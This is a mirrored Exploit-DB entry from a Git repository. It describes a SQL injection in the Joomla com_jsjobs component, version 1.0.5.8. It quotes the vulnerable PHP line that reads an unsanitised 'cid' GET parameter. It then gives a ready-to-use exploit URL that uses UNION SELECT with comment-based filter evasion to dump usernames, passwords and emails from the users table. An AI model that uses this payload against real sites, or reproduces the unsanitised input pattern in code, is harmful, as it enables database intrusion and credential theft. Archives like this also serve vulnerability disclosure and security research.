bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/12822.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

37 lines
No EOL
1.2 KiB
Text
Raw Blame History

# Exploit Title: Joomla Component com_jsjobs SQL Injection Vulnerability
#Date: 31/05/10
#Author: http://www.joomsky.com
#Software Link: http://www.joomsky.com/index.php?option=com_rokdownloads&view=file&task=download&id=23%3Ajs-jobs&Itemid=4
#Version: 1.0.5.8
#Tested on: Linux ubuntu32 2.6.32-22-generic x64
#Summary:
On administrator/components/com_jsjobs/views/application/view.html.php file we can find this segment code on line 53:
if ($cur_layout == 'categories'){
if (isset($_GET['cid'][0])) $c_id= $_GET['cid'][0]; //o0ps..possible SQL Injection }:)
else $c_id='';
if ($c_id == ''){
$cids = JRequest :: getVar('cid', array (0), 'post', 'array');
$c_id= $cids[0];
}
... //conditional check some values with elseifs...
}
This check
if (isset($_GET['cid'][0])) $c_id= $_GET['cid'][0];
open SQLi posibilities for get sense information from servers databases. Some like this:
[+]EXPLOIT:
http://localhost/joomla/administrator/index.php?option=com_jsjobs&task=edit&cid[]=-69/*!union/**/select/**/1,2,3,group_concat%28username,0x3a,password,0x3a,email%29/**/from/**/jos_users*/--
by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i
Reference in a new issue View git blame Copy permalink